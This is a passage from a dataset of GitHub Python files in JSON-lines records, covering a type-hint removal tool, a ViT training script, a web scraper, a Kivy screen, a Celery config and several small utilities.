None\n return node\n\n\nclass TypeHintRemover(ast.NodeTransformer):\n def __init__(self, transform_at_index, preserve_other_types=True, remove_type_imports=True):\n self.transform_at_index = transform_at_index\n self.iter_index = -1\n self.guard_value = None\n self.preserve_other_types = preserve_other_types\n self.remove_type_imports = remove_type_imports\n\n def guard(self, callback):\n self.iter_index += 1\n if self.transform_at_index < 0:\n return\n is_target_node = self.iter_index == self.transform_at_index\n node = callback(preserve_in_original=(is_target_node==self.preserve_other_types))\n if is_target_node:\n self.guard_node = node\n self.guard_value = astunparse.unparse(self.guard_node)\n\n def visit_FunctionDef(self, node):\n def node_empty(preserve_in_original):\n if preserve_in_original:\n to_ret = deepcopy(node.returns)\n else:\n to_ret = node.returns\n node.returns = None\n return to_ret\n\n if node.returns is not None:\n self.guard(node_empty)\n\n if node.args.args:\n for arg in node.args.args:\n def node_empty(preserve_in_original):\n if preserve_in_original:\n to_ret = deepcopy(arg.annotation)\n else:\n to_ret = arg.annotation\n arg.annotation = None\n return to_ret\n if arg.annotation is not None:\n self.guard(node_empty)\n return node\n\n def visit_Import(self, node):\n if self.remove_type_imports:\n node.names = [n for n in node.names if n.name != 'typing']\n return node if node.names else None\n return node\n\n def visit_ImportFrom(self, node):\n if self.remove_type_imports and node.module == 'typing':\n return None\n return node\n\ndef derive_prefix_suffix(original_source: str, removed_value: str):\n index = original_source.find(removed_value, 0)\n while index >= 0:\n yield original_source[:index], original_source[index + len(removed_value):]\n index = original_source.find(removed_value, index + 1)\n\ndef normalize_type(type_, requires_parse=True) -> str:\n # type_: str if requires_parse; else AST\n if requires_parse:\n try:\n parsed = ast.parse(type_)\n except Exception as e:\n print(f\"could not parse type {type_}\")\n print(e)\n return None\n else:\n parsed = type_\n return astunparse.unparse(parsed).strip()\n\ndef get_returns(function_body):\n lines = function_body.splitlines()\n split_lines = [line.strip().split() for line in lines]\n returns = [toks for toks in split_lines if toks and toks[0] == 'return']\n return returns\n\ndef get_non_none_returns(function_body):\n returns = get_returns(function_body)\n return [ret for ret in returns if len(ret) > 1 and ret[1:] != ['None']]\n\ndef create_return_example(source: str, lineno: Optional[int], return_type: Optional[str], imports_and_function=True):\n # pass None for return_type if the type is unknown to not require a type match (@@UNK@@ in the typewriter data)\n try:\n wrapper = cst.MetadataWrapper(cst.parse_module(source))\n except Exception as e:\n print(e)\n return None\n position = wrapper.resolve(cst.metadata.PositionProvider)\n parsed_source = wrapper.module\n def match_with_line_and_type(function, returns):\n function_lineno = position[function].start.line\n return_lineno = position[returns].start.line\n this_return_type = parsed_source.code_for_node(returns.annotation)\n matches_type = (return_type is None) or normalize_type(this_return_type, requires_parse=True) == normalize_type(return_type, requires_parse=True)\n matches_line = (lineno is None) or (lineno == return_lineno) or (lineno == function_lineno) or (lineno == function_lineno-2) or (lineno == function_lineno-1)\n return matches_type and 
matches_line\n processor = TypeHintKeepOnlyTargetedFormatPreserving(['return'], match_with_line_and_type)\n # remove the type annotations, except for the target\n try:\n transformed_parsed_source = parsed_source.visit(processor)\n except Exception as e:\n # visit has trouble with e.g. assignments where the value is an unimported class\n print(e)\n return None\n\n if len(processor.matches) != 1:\n # print(f\"{len(processor.matches)} matches found!\")\n # print(f\"return_type: {return_type}\")\n # print('\\n'.join(source.splitlines()[lineno-1:lineno+2]))\n return None\n\n return_type_from_source = transformed_parsed_source.code_for_node(processor.matches[0]['returns'].annotation)\n\n return_type_from_source = normalize_type(return_type_from_source)\n \n if imports_and_function:\n extra_left = [transformed_parsed_source.code_for_node(node) for node in processor.imports]\n try:\n to_split = transformed_parsed_source.code_for_node(processor.matches[0]['node'])\n except Exception as e:\n print(e)\n return None\n else:\n extra_left = []\n try:\n to_split = transformed_parsed_source.code\n except Exception as e:\n # .code has trouble with e.g. assignments of boolean values created by an equality test\n print(e)\n return None\n \n to_split = arrow_re.sub(\" -> \", to_split)\n pairs = list(derive_prefix_suffix(to_split, f\" -> {return_type_from_source}\"))\n if len(pairs) != 1:\n return None\n assert len(pairs) == 1\n left, right = pairs[0]\n return {\n 'extra_left': extra_left,\n 'left': left + ' -> ',\n 'right': right,\n 'return_type_from_source': return_type_from_source,\n }\n\n\nif __name__ == \"__main__\":\n source = \"\"\"\nimport typing\nfrom typing import Dict, T, Callable\nfrom typing import List\n\ndef foo(bar: Dict[T, List[T]],\n baz: Callable[[T], int] = lambda x: (x+3)/7,\n **kwargs):\n a: int = True\n pass\n\"\"\"\n\n # with open('/tmp/source.py', 'r') as f:\n # source = f.read()\n\n parsed_source = ast.parse(source)\n clean_source = astunparse.unparse(TypeHintRemover(len(source)).visit(ast.parse(source)))\n unique = set()\n for i in range(len(source)):\n transformer = TypeHintRemover(i)\n transformed_ast = transformer.visit(parsed_source)\n transformed = astunparse.unparse(transformed_ast)\n unique.add((transformed, transformer.guard_value))\n infills = []\n for (removed_source, removed_value) in unique:\n print(removed_source)\n print(removed_value)\n if removed_value is None:\n continue\n for left, right in derive_prefix_suffix(clean_source, removed_value.strip()):\n print(\"left:\", left)\n print(\"right:\", right)\n print(\"removed:\", removed_value)\n print()\n infills.append((left,right,removed_value))\n print()\n #pprint(infills)\n","repo_name":"Eric-Wallace/codex","sub_path":"type_hints.py","file_name":"type_hints.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"14092010342","text":"import os\n\nimport torch\nimport torch.distributed as dist\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom timm.models.vision_transformer import _create_vision_transformer\nfrom tqdm import tqdm\nfrom torchvision import transforms\nimport torchvision\n\nimport colossalai\nfrom colossalai.core import global_context as gpc\nfrom colossalai.logging import disable_existing_loggers, get_dist_logger\nfrom colossalai.nn import CrossEntropyLoss\nfrom colossalai.nn._ops import *\nfrom colossalai.nn.lr_scheduler import CosineAnnealingWarmupLR\nfrom colossalai.nn.optimizer import 
HybridAdam\nfrom colossalai.nn.parallel.data_parallel import ColoDDP\nfrom colossalai.tensor import ComputePattern, ComputeSpec, DistSpecManager, ProcessGroup, ShardSpec\nfrom colossalai.utils import get_current_device\nfrom colossalai.utils.model.colo_init_context import ColoInitContext\n\nfrom utils import *\n\n\ndef train_vit():\n\n parser = colossalai.get_default_parser()\n parser.add_argument('--resume_from', default=False, action='store_true')\n\n args = parser.parse_args()\n colossalai.launch_from_torch(config=args.config)\n use_ddp = gpc.config.USE_DDP\n\n disable_existing_loggers()\n\n logger = get_dist_logger()\n if hasattr(gpc.config, 'LOG_PATH'):\n if gpc.get_global_rank() == 0:\n log_path = gpc.config.LOG_PATH\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n logger.log_to_file(log_path)\n\n logger.info('Build data loader', ranks=[0])\n data_transform = {\n \"train\": transforms.Compose([transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n AddGaussianNoise(std=0.01),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]),\n \"val\": transforms.Compose([transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])])}\n trainset = torchvision.datasets.CIFAR10(root = './data',train=True,download=True,transform=data_transform[\"train\"])\n train_dataloader = torch.utils.data.DataLoader(trainset, batch_size=gpc.config.BATCH_SIZE, shuffle=True,num_workers=gpc.config.NW)\n testset = torchvision.datasets.CIFAR10(root='./data', train=False,\n download=True, transform=data_transform[\"val\"])\n test_dataloader = torch.utils.data.DataLoader(testset, batch_size=gpc.config.BATCH_SIZE,\n shuffle=True, num_workers=gpc.config.NW)\n\n logger.info('Build model', ranks=[0])\n\n model_kwargs = dict(img_size=gpc.config.IMG_SIZE,\n patch_size=gpc.config.PATCH_SIZE,\n embed_dim=gpc.config.HIDDEN_SIZE,\n depth=gpc.config.DEPTH,\n num_heads=gpc.config.NUM_HEADS,\n mlp_ratio=gpc.config.MLP_RATIO,\n num_classes=gpc.config.NUM_CLASSES,\n drop_rate=0.1,\n attn_drop_rate=0.1,\n weight_init='jax')\n\n with ColoInitContext(device=get_current_device()):\n model = _create_vision_transformer('vit_small_patch16_224', pretrained=True, **model_kwargs)\n init_spec_func(model, gpc.config.TP_TYPE)\n\n world_size = torch.distributed.get_world_size()\n model = ColoDDP(module=model, process_group=ProcessGroup(tp_degree=world_size))\n logger.info('Build criterion, optimizer, lr_scheduler', ranks=[0])\n optimizer = HybridAdam(model.parameters(), lr=gpc.config.LEARNING_RATE, weight_decay=gpc.config.WEIGHT_DECAY)\n\n criterion = CrossEntropyLoss()\n lr_scheduler = CosineAnnealingWarmupLR(optimizer=optimizer,\n total_steps=gpc.config.NUM_EPOCHS,\n warmup_steps=gpc.config.WARMUP_EPOCHS)\n\n start_epoch = 0\n if args.resume_from:\n load_model = torch.load(args.resume_from + '_model.pth')\n start_epoch = load_model['epoch']\n model.load_state_dict(load_model['model'])\n load_optim = torch.load(args.resume_from + '_optim_rank_{}.pth'.format(dist.get_rank()))\n optimizer.load_state_dict(load_optim['optim'])\n\n for epoch in range(start_epoch, gpc.config.NUM_EPOCHS):\n model.train()\n for index, (x, y) in tqdm(enumerate(train_dataloader), total=len(train_dataloader), leave=False):\n x, y = x.cuda(), y.cuda()\n output = model(x)\n loss = criterion(output, y)\n loss = loss / gpc.config.gradient_accumulation\n if use_ddp:\n model.backward(loss)\n else:\n loss.backward()\n if (index + 1) % 
gpc.config.gradient_accumulation == 0:\n optimizer.step()\n if use_ddp:\n model.zero_grad()\n else:\n optimizer.zero_grad()\n\n logger.info(\n f\"Finish Train Epoch [{epoch+1}/{gpc.config.NUM_EPOCHS}] loss: {loss.item():.3f} lr: {optimizer.state_dict()['param_groups'][0]['lr']}\",\n ranks=[0])\n\n model.eval()\n test_loss = 0\n correct = 0\n test_sum = 0\n with torch.no_grad():\n for index, (x, y) in tqdm(enumerate(test_dataloader), total=len(test_dataloader), leave=False):\n x, y = x.cuda(), y.cuda()\n output = model(x)\n test_loss += F.cross_entropy(output, y, reduction='sum').item()\n pred = output.argmax(dim=1, keepdim=True)\n correct += pred.eq(y.view_as(pred)).sum().item()\n test_sum += y.size(0)\n\n test_loss /= test_sum\n logger.info(\n f\"Finish Test Epoch [{epoch+1}/{gpc.config.NUM_EPOCHS}] loss: {test_loss:.3f} Accuracy: [{correct}/{test_sum}]({correct/test_sum:.3f})\",\n ranks=[0])\n\n lr_scheduler.step()\n\n\nif __name__ == '__main__':\n train_vit()","repo_name":"Kaiwen-Tang/CS6101","sub_path":"train_vit.py","file_name":"train_vit.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11750957140","text":"# 100% O(n^2) time complexity\ndef twoNumberSum1(array, targetSum):\n tracking_array = []\n for i in array:\n for j in array:\n if j + i == targetSum and j != i:\n tracking_array.append([i, j])\n\n for x in tracking_array:\n x.sort()\n result = [list(t) for t in set(tuple(x) for x in tracking_array)]\n return result[0] if len(result) >= 1 else result\n\n\n# 100% O(n) time complexity\ndef twoNumberSum2(array, targetSum):\n if len(array) == 0 or len(array) == 1:\n return []\n dictionary = {}\n for i in range(len(array)):\n second_number = targetSum - array[i]\n if second_number in dictionary.keys():\n second_index = array.index(second_number)\n if i != second_index:\n return sorted([array[i], array[second_index]])\n dictionary.update({array[i]: i})\n return []\n","repo_name":"Alexandru-S/Code_Solutions","sub_path":"two_number_sum/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"14623546200","text":"import sys\nimport csv\nimport re\n\ncategories_file = sys.argv[1]\nexpenses_file = sys.argv[2]\nexisting_categories = dict()\nnew_categories = dict()\n\nwith open(categories_file) as categories_csv:\n categories_reader = csv.reader(categories_csv, delimiter=';', quotechar='\"')\n next(categories_reader) # Skips header\n for row in categories_reader:\n existing_categories[row[0]] = 1\nwith open(expenses_file, encoding='iso-8859-1') as expenses_csv:\n expenses_reader = csv.reader(expenses_csv, delimiter=';', quotechar='\"')\n for row in expenses_reader:\n if len(row) >= 5 and re.match('.\\d*\\.?\\d+,\\d+', row[5]):\n new_categories[row[2]] = 1\nf = open(categories_file, 'a')\nnew_categories_count = 0\nfor new_category in new_categories.keys():\n if new_category and new_category not in existing_categories:\n new_categories_count += 1\n f.write('{};;\\n'.format(new_category))\nprint('Added {} categories to {}'.format(new_categories_count, categories_file))\n","repo_name":"michelebraidotti/scripts","sub_path":"expenses_analysis/expense_categotries_update.py","file_name":"expense_categotries_update.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} 
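Editor's note: the train_vit.py record above divides its loss by gpc.config.gradient_accumulation and only calls optimizer.step() every N batches — the standard gradient-accumulation pattern. Below is a minimal, framework-agnostic sketch of that pattern in plain PyTorch; the model, loader, and accum_steps value are hypothetical stand-ins, and the record's ColossalAI/DDP specifics are deliberately omitted.

import torch
import torch.nn as nn

accum_steps = 4  # assumed value; the record reads this from gpc.config
model = nn.Linear(10, 2)  # stand-in model, for illustration only
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
criterion = nn.CrossEntropyLoss()

# Dummy data: 8 mini-batches of (inputs, labels).
batches = [(torch.randn(16, 10), torch.randint(0, 2, (16,))) for _ in range(8)]

optimizer.zero_grad()
for index, (x, y) in enumerate(batches):
    loss = criterion(model(x), y)
    # Scale so the accumulated gradient equals the mean over accum_steps batches,
    # matching the record's `loss = loss / gpc.config.gradient_accumulation`.
    (loss / accum_steps).backward()
    if (index + 1) % accum_steps == 0:
        optimizer.step()       # one parameter update per accum_steps mini-batches
        optimizer.zero_grad()  # reset the accumulated gradients

The net effect is an effective batch size of accum_steps times the loader's batch size at the memory cost of a single mini-batch.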
+{"seq_id":"17907414881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis software is the implementation of the following article submitted to TPAMI:\n\tCastellini A., Masillo F., Azzalini D., Amigoni F., Farinelli A., Adversarial Data Augmentation for HMM-based Anomaly Detection\nIn this stage, the software is intended for reviewers' use only.\n\"\"\"\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nargs_list = sys.argv\nif \"--result_dir\" in args_list:\n\tfolder = sys.argv[args_list.index(\"--result_dir\")+1]\nelse:\n\tprint(\"Mandatory parameter --result_dir not found please check input parameters\")\n\tsys.exit()\nif \"--adv_method\" in args_list:\n\tadv_method = sys.argv[args_list.index(\"--adv_method\")+1]\nelse:\n\tprint(\"Mandatory parameter --adv_method not found please check input parameterss\")\n\tsys.exit()\nif \"--train_sizes\" in args_list:\n\ttrain_sizes = sys.argv[args_list.index(\"--train_sizes\")+1].split(',')\nelse:\n\tprint(\"Mandatory parameter --train_sizes not found please check input parameters\")\n\tsys.exit() \n\n\n\ntrain_sizes = [int(t) for t in train_sizes]\nf1s = [] * len(train_sizes)\n\n\nfor train_size in sorted(train_sizes):\n f1 = []\n data = pd.read_csv(f\"{folder}/f1_scores_train_size_{train_size}_adv_method_{adv_method}.csv\")\n for col in data.columns:\n f1.append(np.nanmean(data[col]))\n f1s.append(f1)\n\nplt.figure()\nfor i, col in enumerate(data.columns):\n to_plot = []\n for j, train_size in enumerate(sorted(train_sizes)):\n to_plot.append(f1s[j][i])\n if len(train_sizes) == 1:\n plt.scatter(train_sizes, to_plot, label=col)\n else:\n plt.plot(to_plot, label=col)\n\nplt.title('F1 score')\nif len(train_sizes) != 1:\n plt.xticks(range(len(train_sizes)), train_sizes)\nplt.legend()\nplt.tight_layout()\nplt.savefig(f'{folder}/plot_{adv_method}-AUG.pdf')\n","repo_name":"HHADAdversarialAugmentation/adv_data_aug_hmm","sub_path":"plot_f1.py","file_name":"plot_f1.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"22844936647","text":"'''\n提取某一页的所有段子\n获取了HTML代码之后,我们开始分析怎样获取某一页的所有段子。\n\n首先我们审查元素看一下,按浏览器的F12\n\n我们可以看到,每一个段子都是<div class=”article block untagged mb15″ id=”…”>…</div>包裹的内容。\n\n��在我们想获取发布人,发布日期,段子内容,以及点赞的个数。不过另外注意的是,段子有些是带图片的,如果我们想在控制台显示图片是不现实的,所以我们直接把带有图片的段子给它剔除掉,只保存仅含文本的段子。\n\n所以我们加入如下正则表达式来匹配一下,用到的方法是 re.findall 是找寻所有匹配的内容。方法的用法详情可以看前面说的正则表达式的介绍。\n\n好,我们的正则表达式匹配语句书写如下,在原来的基础上追加如下代码\n\n\n'''\nimport urllib.request as r\nimport urllib.parse as p\nimport re\n\npage = 1\nurl = 'http://www.qiushibaike.com/hot/page/' + str(page)\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36'\nheaders = { 'User-Agent' : user_agent }\ntry:\n request = r.Request(url=url,headers = headers)\n response = r.urlopen(request)\n res=response.read()\n# print(res.decode(encoding='utf-8'))\nexcept r.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)\n#运行终于正常了,打印出了第一页的HTML代码\n#追加正则表达\ncontent = res.decode('utf-8')\npattern = re.compile('<div.*?author clearfix\">.*?<h2>(.*?)</h2>.*?<span>(.*?)'+\n '</span>.*?<div class=\"stats.*?class=\"number\">(.*?)</i>',re.S)\nitems = re.findall(pattern,content)\nfor item in items:\n print(item[0],item[1],item[2])\n\n#1).*? 是一个固定的搭配,.和*代表可以匹配任意无限多个字符,加上?表示使用非贪婪模式进行匹配,也就是我们会尽可能短地做匹配,以后我们还会大量用到 .*? 
的搭配。\n\n#2)(.*?)代表一个分组,在这个正则表达式中我们匹配了三个分组,在后面的遍历item中,item[0]就代表第一个(.*?)所指代的内容,item[1]就代表第二个(.*?)所指代的内容,以此类推。\n\n#3)re.S 标志代表在匹配时为点任意匹配模式,点 . 也可以代表换行符。\n\n#这样我们就获取了发布人,发布内容,以及点赞数。\n#带图片的段子进行过滤\n#for item in items:\n# haveImg = re.search(\"img\",item[3])\n# if not haveImg:\n# print item[0],item[1],item[2],item[4]\n\n\n\n","repo_name":"ChWeiking/PythonSpider","sub_path":"PythonSpider/Python爬虫/爬虫Python实战/实战1/糗百3.py","file_name":"糗百3.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"29553689107","text":"import spacy as spacy\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom app.ml.pipline import Extractor\n\nspacy_en = spacy.load('en_core_web_sm')\nspacy_en.remove_pipe('tagger')\nspacy_en.remove_pipe('ner')\nvocab = list(spacy_en.vocab.strings)\n\n\ndef tokenizer(text, use_lema=False): # create a tokenizer function\n p = 'lemma_' if use_lema else 'text' # property to use\n return [getattr(tok, p, '') for tok in spacy_en.tokenizer(text)\n if tok.text.isalpha()\n and len(getattr(tok, p, '')) > 1\n and getattr(tok, p, '') not in ['\\ufeff1', '-PRON-', '-pron-']]\n\n\ncounters = dict(\n [(i,\n CountVectorizer(ngram_range=(1, i),\n stop_words=\"english\",\n tokenizer=tokenizer,\n # vocabulary=vocab\n )\n )\n for i in range(1, 4)]\n)\nextractor = Extractor(tokenizer)\n","repo_name":"lifast-dayoungovich/Semantic-Back","sub_path":"app/ml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"27267124491","text":"from kivy.metrics import dp\n\nfrom previews.creator_article_preview import CreatorArticlePreview\nfrom my_screen import MyScreen\nfrom kivymd.app import MDApp\n\nimport requests\n\nfrom author_pages.new_article_screen import NewArticleScreen\n\n\nclass ArticlePageScreen(MyScreen):\n def __init__(self, **kwargs):\n super(ArticlePageScreen, self).__init__(**kwargs)\n self.ids.articles_grid.bind(minimum_height=self.ids.articles_grid.setter('height'))\n self.ids.layout.bind(minimum_height=self.ids.layout.setter('height'))\n\n def load_articles(self):\n self.ids.articles_grid.clear_widgets()\n creator_id = MDApp.get_running_app().user\n articles = requests.get(\"https://lifehealther.onrender.com/article/creator/\" + str(creator_id))\n if articles.json() != {}:\n for i in articles.json().values():\n url = \"https://lifehealther.onrender.com/article/\" + str(i[\"id\"])\n article_info = requests.get(url)\n article_info = article_info.json()\n article_text = article_info[\"text\"]\n if len(article_text) > 115:\n article_text = article_text[:115] + \"...\"\n article_preview = CreatorArticlePreview(size_hint_y=None,\n height=dp(250),\n content_id=i[\"id\"],\n headline=article_info[\"article_name\"],\n text_preview=article_text,\n create_upd=self.create_upd\n )\n self.ids.articles_grid.add_widget(article_preview)\n\n def create_upd(self, upd_screen):\n self.manager.add_widget(upd_screen)\n self.manager.screen_history.append(self.manager.current)\n self.manager.current = 'update_article'\n self.manager.transition.direction = 'left'\n\n def create_add(self):\n 
self.manager.add_widget(NewArticleScreen(name='new_article'))\n","repo_name":"safonchikk/diploma","sub_path":"author_pages/article_page.py","file_name":"article_page.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38047361491","text":"import os\nimport logging\nimport stackprinter\n\nfrom celery import Celery, Task\nfrom celery.schedules import crontab\n\nfrom django.apps import apps, AppConfig\nfrom django.conf import settings\n\nif not settings.configured:\n # set the default Django settings module for the 'celery' program.\n os.environ.setdefault(\n \"DJANGO_SETTINGS_MODULE\", \"config.settings.local\"\n ) # pragma: no cover\n\napp = Celery(\"instanotifier\")\n\n\nclass CeleryConfig(AppConfig):\n name = \"instanotifier.taskapp\"\n verbose_name = \"Celery Config\"\n\n def ready(self):\n # Using a string here means the worker will not have to\n # pickle the object when using Windows.\n app.config_from_object(\"django.conf:settings\", namespace=\"CELERY\")\n installed_apps = [app_config.name for app_config in apps.get_app_configs()]\n app.autodiscover_tasks(lambda: installed_apps, force=True)\n\n\napp.conf.beat_schedule = {\n \"fetch_all_sources_daily\": {\n \"task\": \"instanotifier.feedsource.tasks.fetch_all_sources\",\n \"schedule\": crontab(minute=00, hour=[11, 23]),\n }\n}\n\n\nclass LogErrorsTask(Task):\n def on_failure(self, exc, task_id, args, kwargs, einfo):\n tb = stackprinter.format(exc)\n logging.error(tb)\n super().on_failure(exc, task_id, args, kwargs, einfo)\n\n\n@app.task(bind=True)\ndef debug_task(self):\n print(\"Request: {0!r}\".format(self.request)) # pragma: no cover\n","repo_name":"AlexanderKaluzhny/instanotifier","sub_path":"instanotifier/taskapp/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"23566534595","text":"# -*- coding: utf-8 -*-\nimport string\nclass Linguist(object):\n \n def __init__(self,message):\n self.message = message\n def analyse_text(self):\n analyse = dict()\n word_occurance = dict()\n charac_occurance = dict()\n analyse[\"length of the string\"] = len(self.message) \n self.word_count = 1\n self.charac_count = 0\n for x in self.message :\n if x == \" \" :\n self.word_count += 1\n else :\n self.charac_count += 1\n analyse[\"word count\"] = self.word_count\n analyse[\"no of character\"] = self.charac_count\n charac_list = list(self.message)\n word_list = (self.message).split()\n for word in word_list:\n word_occurance[word] = word_list.count(word)\n self.nonrepeat = 0\n for word in word_occurance :\n if word_occurance[word] == 1 : \n self.nonrepeat += 1\n analyse[\"unique word\"] = self.nonrepeat\n for letter in charac_list:\n charac_occurance[letter] = charac_list.count(letter)\n self.letter_count = 0\n for letter in charac_occurance :\n if charac_occurance[letter] == 1 :\n self.letter_count += 1\n analyse[\"unique character\"] = self.letter_count\n return analyse\n def is_english(self):\n letter_list = list(self.message)\n result = True\n for letter in letter_list :\n if letter in list(string.ascii_letters) or letter == \" \" :\n result = True\n else:\n result = False\n break\n return result\n \n \n \nobj = Linguist('my name is jamesbond007')\nprint(obj.is_english()) \n 
","repo_name":"joelranjithjebanesan7/Python-Programs","sub_path":"session5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"19897186362","text":"# -*- coding: utf-8 -*-\n\nfrom simmate.apps.vasp.workflows.static_energy.matproj import (\n StaticEnergy__Vasp__Matproj,\n)\n\n\nclass Nmr__Vasp__MatprojChemicalShifts(StaticEnergy__Vasp__Matproj):\n \"\"\"\n This task is a reimplementation of pymatgen's\n [MPNMRSet](https://pymatgen.org/pymatgen.io.vasp.sets.html#pymatgen.io.vasp.sets.MPNonSCFSet)\n with mode=\"cs\" (Chemical Shift).\n \"\"\"\n\n incar = StaticEnergy__Vasp__Matproj.incar.copy()\n incar.update(\n dict(\n LCHIMAG=True,\n EDIFF=-1.0e-10,\n ISYM=0,\n LCHARG=False,\n LNMR_SYM_RED=True,\n NELMIN=10,\n NSLPLINE=True,\n PREC=\"ACCURATE\",\n SIGMA=0.01,\n )\n )\n incar.pop(\"EDIFF__per_atom\")\n","repo_name":"jacksund/simmate","sub_path":"src/simmate/apps/vasp/workflows/nuclear_magnetic_resonance/matproj_chemical_shifts.py","file_name":"matproj_chemical_shifts.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"57"} +{"seq_id":"74699956016","text":"'''\nFunction to handle retrieving the skydiving weather\n'''\n\nimport response_helper\n\ndef get_skydiving_weather(intent, session):\n session_attributes = {}\n reprompt_text = None\n \n speech_output = \"It's sunny blue skies! go jump!\"\n should_end_session = True\n \n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. If the user does not respond or says something that is not\n # understood, the session will end.\n return response_helper.build_response(session_attributes, response_helper.build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))","repo_name":"anirudhranganath/alexa-skydiving-weather","sub_path":"src/behaviour/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"15159227489","text":"import numpy as np\nfrom scipy import signal\n\n\ndef gkern(kernlen=21, std=None):\n \"\"\"Returns a 2D Gaussian kernel array.\"\"\"\n if std is None:\n std = kernlen / 4\n gkern1d = signal.gaussian(kernlen, std=std).reshape(kernlen, 1)\n gkern2d = np.outer(gkern1d, gkern1d)\n return gkern2d\n\n\ndef build_gaussian_heatmaps(kp_xyc, w, h, gaussian=None):\n gaussian_heatmaps = np.zeros((len(kp_xyc), h, w))\n for i, kp in enumerate(kp_xyc):\n # do not use invisible keypoints\n if kp[2] == 0:\n continue\n\n kpx, kpy = kp[:2].astype(int)\n\n if gaussian is None:\n g_scale = 6\n g_radius = int(w / g_scale)\n gaussian = gkern(g_radius * 2 + 1)\n else:\n g_radius = gaussian.shape[0] // 2\n\n rt, rb = min(g_radius, kpy), min(g_radius, h - 1 - kpy)\n rl, rr = min(g_radius, kpx), min(g_radius, w - 1 - kpx)\n\n gaussian_heatmaps[i, kpy - rt:kpy + rb + 1, kpx - rl:kpx + rr + 1] = gaussian[\n g_radius - rt:g_radius + rb + 1,\n g_radius - rl:g_radius + rr + 1]\n return gaussian_heatmaps\n","repo_name":"VlSomers/bpbreid","sub_path":"torchreid/utils/imagetools.py","file_name":"imagetools.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"57"} +{"seq_id":"13694304535","text":"# performance.py\nfrom time import time\nmx = 5000\n\nt = time() # 
start time for the for loop\nfloop = []\nfor a in range(1, mx):\n\tfor b in range(a, mx):\n\t\tfloop.append(divmod(a, b))\nprint('for loop: {:4f} s' . format(time() - t)) # elapsed time\n\nt = time() # start time for the list comprehension\ncompr = [divmod(a, b) for a in range(1, mx) for b in range(a, mx)]\nprint('list comprehension: {:4f} s' . format(time() - t))\n\nt = time() # start time for the generator expression\ngener = list(divmod(a, b) for a in range(1, mx) for b in range(a, mx))\nprint('generator expression: {:4f} s' . format(time() - t))\n","repo_name":"mhVxVNMwXkm9s4Ze9VASei/Learn-Python-Programming","sub_path":"05. Comprehensions and Generators/36. performance.py","file_name":"36. performance.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"5043797224","text":"# Centralized definitions for injecting reusable variables\n# into templates. Variables should be added to the dict returned by\n# the template_variables function.\n\nimport pytz\nfrom flask import g, request, current_app\n\nimport sfa_dash\nfrom sfa_dash import filters\nfrom solarforecastarbiter.datamodel import (\n ALLOWED_CATEGORIES,\n ALLOWED_DETERMINISTIC_METRICS,\n ALLOWED_EVENT_METRICS,\n ALLOWED_PROBABILISTIC_METRICS,\n ALLOWED_VARIABLES,\n COMMON_NAMES,\n)\nfrom solarforecastarbiter.validation.quality_mapping import (\n DISCARD_BEFORE_RESAMPLE)\nfrom solarforecastarbiter.metrics.deterministic import _REQ_REF_FX as DETREF\nfrom solarforecastarbiter.metrics.probabilistic import _REQ_REF_FX as PROBREF\nfrom solarforecastarbiter.metrics.event import _REQ_REF_FX as EVENTREF\n\n\n\nTIMEZONES = pytz.country_timezones('US') + list(\n filter(lambda x: 'GMT' in x, pytz.all_timezones))\n\n\nVARIABLE_OPTIONS = {key: f'{value} ({filters.api_varname_to_units(key)})'\n for key, value in filters.variable_mapping.items()}\n\nDEFAULT_VARIABLE = 